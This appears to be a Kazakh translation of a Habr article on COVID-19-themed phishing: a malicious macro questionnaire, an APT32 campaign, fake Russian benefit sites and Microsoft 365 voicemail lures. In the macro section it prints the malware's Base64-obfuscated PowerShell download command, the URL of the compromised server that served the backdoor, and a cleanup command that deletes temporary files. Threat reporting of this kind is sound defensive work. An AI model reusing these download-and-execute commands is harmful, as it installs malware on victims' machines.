Шабуылшылар COVID-19 тақырыбын пайдалануды жалғастыруда, бұл эпидемияға қатысты барлық нәрсеге қызығушылық танытатын пайдаланушылар үшін көбірек қауіп төндіреді. IN
Есіңізде болсын
COVID-19 тегін тестілеуді қалайсыз ба?
Коронавирустық тақырыптағы фишингтің тағы бір маңызды мысалы болды
Көптеген пайдаланушыларды макростарды қосуға сендіру де оңай болды. Ол үшін стандартты трюк қолданылды: сауалнаманы толтыру үшін алдымен макростарды қосу керек, яғни VBA сценарийін іске қосу керек.
Көріп отырғаныңыздай, VBA сценарийі антивирустардан арнайы маскаланған.
Windows жүйесінде күту мүмкіндігі бар, онда қолданба әдепкі «Иә» жауабын қабылдағанға дейін /T <секунд> күтеді. Біздің жағдайда сценарий уақытша файлдарды жоймас бұрын 65 секунд күтті:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Күту кезінде зиянды бағдарлама жүктелді. Бұл үшін арнайы PowerShell сценарийі іске қосылды:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Base64 мәнін декодтаудан кейін PowerShell сценарийі Германиядан бұрын бұзылған веб-серверде орналасқан бэкдорды жүктейді:
http://automatischer-staubsauger.com/feature/777777.png
және оны келесі атаумен сақтайды:
C:UsersPublictmpdirfile1.exe
папка ‘C:UsersPublictmpdir’
пәрмені бар "tmps1.bat" файлын іске қосқан кезде жойылады cmd /c mkdir ""C:UsersPublictmpdir"".
Мемлекеттік органдарға мақсатты шабуыл
Сонымен қатар, жақында FireEye сарапшылары Уханьдағы үкіметтік құрылымдарға, сондай-ақ Қытайдың Төтенше жағдайлар министрлігіне бағытталған мақсатты APT32 шабуылы туралы хабарлады. Таратылған RTF файлдарының бірінде New York Times мақаласына сілтеме бар
Бір қызығы, анықтау кезінде антивирустардың ешқайсысы бұл дананы анықтаған жоқ, деп хабарлайды Virustotal.
Ресми веб-сайттар жұмыс істемей тұрғанда
Фишингтік шабуылдың ең жарқын мысалы Ресейде өткен күні болды. Бұған 3 пен 16 жас аралығындағы балаларға көптен күткен жәрдемақының тағайындалуы себеп болды. 12 жылдың 2020 мамырында өтініштерді қабылдау басталғаны туралы хабарланғанда, миллиондаған адамдар көптен күткен көмекті алу үшін Мемлекеттік қызметтер веб-сайтына жүгіріп, порталды кәсіби DDoS-шабуылынан да жаман етпеді. Президент «Мемлекеттік қызметтер өтініштер ағынына төтеп бере алмайды» дегенде, адамдар онлайн режимінде өтініштерді қабылдаудың балама сайтының іске қосылуы туралы айта бастады.
Мәселе мынада, бірнеше сайт бірден жұмыс істей бастады, ал біреуі, posobie16.gosuslugi.ru сайтындағы нақты, іс жүзінде қосымшаларды қабылдайды, басқалары.
SearchInform әріптестері .ru аймағында 30-ға жуық жаңа алаяқтық домендерді тапты. Infosecurity және Softline компаниясы сәуір айының басынан бері 70-тен астам осындай жалған мемлекеттік қызмет веб-сайттарын бақылаған. Оларды жасаушылар таныс символдарды манипуляциялайды, сонымен қатар gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie және т.б. сөздердің тіркесімін пайдаланады.
Хайп және әлеуметтік инженерия
Барлық осы мысалдар шабуылдаушылардың коронавирус тақырыбын сәтті монетизациялап жатқанын растайды. Әлеуметтік шиеленіс және түсініксіз мәселелер неғұрлым жоғары болса, алаяқтардың маңызды деректерді ұрлау, адамдарды өз ақшасынан өз бетінше бас тартуға мәжбүрлеу немесе жай ғана көбірек компьютерлерді бұзу мүмкіндігі артады.
Пандемия әлеуетті дайын емес адамдарды үйден жаппай жұмыс істеуге мәжбүр еткенін ескерсек, жеке ғана емес, корпоративтік деректерге де қауіп төніп тұр. Мысалы, жақында Microsoft 365 (бұрынғы Office 365) пайдаланушылары да фишинг шабуылына ұшырады. Адамдар хаттарға қосымша ретінде жаппай «жіберілген» дауыстық хабарламаларды алды. Дегенмен, файлдар шын мәнінде шабуыл құрбандарын жіберген HTML беті болды
Ақпарат көзі: www.habr.com